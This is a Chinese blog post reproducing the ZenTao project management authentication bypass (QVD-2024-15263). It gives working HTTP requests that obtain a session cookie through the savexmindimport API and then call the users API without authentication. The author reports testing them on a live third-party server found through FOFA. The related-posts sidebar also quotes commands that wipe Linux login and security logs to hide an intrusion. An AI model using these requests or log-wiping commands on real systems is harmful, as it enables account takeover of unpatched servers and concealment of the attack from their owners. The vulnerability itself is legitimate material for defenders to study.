禅道项目管理系统身份认证绕过漏洞

已于 2024-04-29 17:31:04 修改
阅读量1k 收藏 5
点赞数 2
分类专栏: 漏洞复现 文章标签: web安全
于 2024-04-27 17:30:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huangyongkang666/article/details/138253899
版权

禅道项目管理系统身份认证绕过漏洞(QVD-2024-15263)

1.漏洞描述

禅道项目管理软件是国产的开源项目管理软件,专注研发项目管理,内置需求管理、任务管理、bug管理、缺陷管理、用例管理、计划发布等功能,完整覆盖了研发项目管理的核心流程。

禅道项目管理系统存在身份认证绕过漏洞,远程攻击者利用该漏洞可以绕过身份认证,调用任意API接口并修改管理员用户的密码,并以管理员用户登录该系统,配合其他漏洞进一步利用后,可以实现完全接管服务器

影响版本

16.x <= 禅道项目管理系统< 18.12(开源版)

6.x <= 禅道项目管理系统< 8.12(企业版)

3.x <= 禅道项目管理系统< 4.12(旗舰版)

2.漏洞复现

环境在fofa上找了一个 禅道项目管理系统

首先获取cookie。

GET /api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=fkazcfyqgknhqdkbpttl&branch=qkkcluybdvfxqngbemmn HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
Cache-Control: no-cache

在这里插入图片描述

带cookie访问

GET /api.php/v1/users HTTP/1.1
Host: 
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: zentaosid=u7i38b0judkg2rgjgqcv7lh312

在这里插入图片描述

出现截图字段:error: no company-browse priv 证明漏洞存在

3.漏洞修复

目前官方已有可更新版本,建议受影响的用户尽快升级至安全版本:

makven60
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
禅道项目管理系统身份认证绕过漏洞复现(QVD-2024-15263)
0xSec
04-28 1216
2024年4月,互联网披露禅道系统存在身份认证绕过漏洞情报。经分析,确认该漏洞利用简单,并可能在绕过权限后利用后台其他漏洞实现远程代码执行,建议受影响的客户尽快修复漏洞
禅道项目管理系统身份认证绕过漏洞(QVD-2024-15263)POC
05-10
禅道身份认证POC测试payload
0day禅道项目管理系统身份认证绕过漏洞
weixin_43167326的博客
04-26 1216
禅道(ZenTao)是一款国产的,基于LGPL协议和敏捷方法scrum,开源免费的项目管理软件。禅道内置需求管理、任务管理、bug管理、缺陷管理、用例管理、计划发布等功能,实现了软件的完整生命周期的全面覆盖。
漏洞复现】ZenTao PMS 项目管理系统身份认证绕过漏洞
qq_67810151的博客
04-26 300
ZenTao PMS 存在身份认证绕过漏洞,攻击者可在无需登陆的情况下利用该漏洞调用相关API功能重制密码等,并结合其他后台远程代码执行漏洞执行代码,控制服务器。
禅道项目管理系统 身份验证漏洞分析QVD-2024-15263
shelter1234567的博客
05-03 836
最近不怎么更新了!向小伙伴说明下 我不是什么组织 更不什么经销号(尽管csdn有很多经销广告号)一确实是下岗了!忙着为找工作而发愁。简历都投出去如同石沉大海能不愁吗!.哎......二是忙着论文及材料的事....三是也看了最近的漏洞,感觉也没啥可分析的 一眼就看出问题所在。有什么可分析的呢!就像医生看看患者如同看萝卜白菜一样.....,那分析反序列化链呢,这也没什么意思啊!话说到此,今儿个就推荐你看这篇文章。有一定难度挑战度,内容还是跟以前一样,以一个挖洞者的视角来讲解分析。
1-禅道项目管理系统-使用手册
11-14
禅道项目管理系统-使用手册,禅道项目管理系统-使用手册,
禅道项目管理系统
04-03
项目协作管理,越复杂越有序,足够简单足够有效,道项目管理软件集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款功能完备的项目管理软件,完美地覆盖了项目管理的核心流程。
禅道项目管理系统操作指引.pptx
03-06
禅道,是一款国产开源项目管理软件。它集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款专业的研发项目管理软件。主要管理思想基于国际流行的 敏捷项目管理方法—Scrum,在此管理方法上...
禅道项目管理软件 v9.0
12-02
禅道是第一款国产的开源项目管理软件。它集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款专业的研发项目管理软件,完整地覆盖了项目管理的核心流程。注重实效的管理思想,合理的软件...
web安全之登录框渗透骚姿势,新思路
qq_47289634的博客
05-10 594
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
Web安全:企业如何抵御常见的网络攻击?
最新发布
m0_66326520的博客
05-16 669
针对网站的攻击有多种形式,攻击者既可以是业余黑客,也会是协同作战的职业黑客团伙。最关键的一条建议,就是在创建或运营网站时不要跳过安全功能,因为跳过安全设置可能会造成严重后果。虽然不可能完全消除网站攻击风险,但你至少可以缓解遭攻击的可能性和攻击后果的严重性。遭受攻击后,不仅需要及时的响应处置还需要避免同类事件的发生,因此事后的复盘分析尤为重要,做好安全防护才是最高效的网络攻击解决方案。
网络安全(黑客)—-2024自学手册
xv7676的博客
05-06 2123
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
威胁建模的艺术:了解网络安全风险的另一面
西数科技-专注于数据恢复与司法鉴定
05-13 513
从广义上讲,威胁建模涉及从日常的安全工作中退一步,以了解企业的系统、评估网络和数字资源、识别威胁环境中的漏洞并优先考虑涵盖保护、响应、补救和恢复的计划。TRIKE是一种基于知识库的开源建模方法,通过收集、整理和分析威胁情报,构建一个全面的知识库,主要包括威胁漏洞、攻击向量等信息,来帮助组织理解和管理其面临的威胁和风险。然而,这种方式目前必须要改变。组织应该通过定期审查来更新和改进威胁模型,确保它们准确地反映当前的威胁环境和系统本身的任何变化,从而保持一个强大的、响应性强的安全状态,以适应不断涌现的新挑战。
什么是蜜罐,在当前网络安全形势下,蜜罐能提供哪些帮助
dexunyun的博客
05-16 773
要建立一个成功的蜜罐系统,需要经过详细的规划和设计,并且与专业的安全团队合作,德迅云安全会根据用户的需求和威胁情报,选择合适的蜜罐类型和部署位置。而蜜罐就是其中重要的举措,旨在提供额外的安全层。蜜罐可以记录攻击者的工具、技术和过程信息,通过分析攻击者的行为、技术和策略,可以获取关于新的攻击向量、漏洞和威胁情报的重要信息。低交互蜜罐:低交互蜜罐只模拟了系统的一部分功能,通常只包括网络服务和部分应用程序,为攻击者提供简单的交互,配置简单,容易部署,但受限于交互能力,可能无法捕获高价值的攻击。
【网络安全】系统日志清理的操作步骤
weixin_43822401的博客
05-16 180
如果访问了某些服务,比如说通过 apache 服务获得一个 shell,你还需要清理 apache 服务的访问日。删除登录成功记录:echo > /var/log/wtmp (此时执行 last 命令就会发现没有记录)仅本地清理,如果目标服务存在日志服务器的话,所有日志还会被保留。这里仅清理系统相关日志,3. 删除日志记录:echo > /var/log/secure。删除登录失败记录:echo > /var/log/btmp。删除系统日志目录下的一些日志文件。1. 访问失败的日志。2. 访问成功的日志。
《2024网络安全报告》中文版
2301_76786857的博客
05-10 529
Check Point发布了《2024 年网络安全报告》,Check Point Research 对网络攻击数据(包括所有地区和全球的统计数据)进行了全面分析,揭示了不断变化的网络威胁形势。● 勒索软件攻击形势严重恶化,传统勒索软件和更难应对的大规模勒索软件攻击均大幅增长。● 去年,全球 1/10 的机构遭遇勒索软件攻击尝试,比上一年激增 33%● 零售/批发相关企业每周所遇攻击次数骤增。
网络安全好吗
weixin_51347473的博客
05-13 212
2. **维护企业运营**:对于企业来说,网络安全可以防止商业机密泄露,保护企业声誉,避免因数据泄露或网络攻击导致的经济损失。7. **促进创新**:在一个安全的环境中,企业和个人更有可能进行创新和尝试新技术,因为他们知道他们的创意和投资是受到保护的。1. **保护个人信息**:网络安全可以帮助保护用户的个人信息,如身份信息、财务数据和通信内容,防止它们被黑客窃取和滥用。6. **保护知识产权**:网络安全可以帮助企业和个人保护其知识产权,如专利、商标和版权作品,防止它们被盗窃或非法使用。
禅道管理员身份怎么创建项目
03-29
禅道管理员可以按照以下步骤创建项目: 1. 登录禅道系统,进入管理员账号。 2. 点击顶部导航栏中的“项目管理”按钮。 3. 在项目管理页面中,点击“添加项目”按钮。 4. 在弹出的添加项目窗口中,填写项目名称、项目描述、负责人等信息。 5. 根据需要设置项目的权限、模块、计划等选项。 6. 点击“保存”按钮,完成项目创建。 创建项目后,管理员可以根据需要对项目进行设置、管理和监控。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值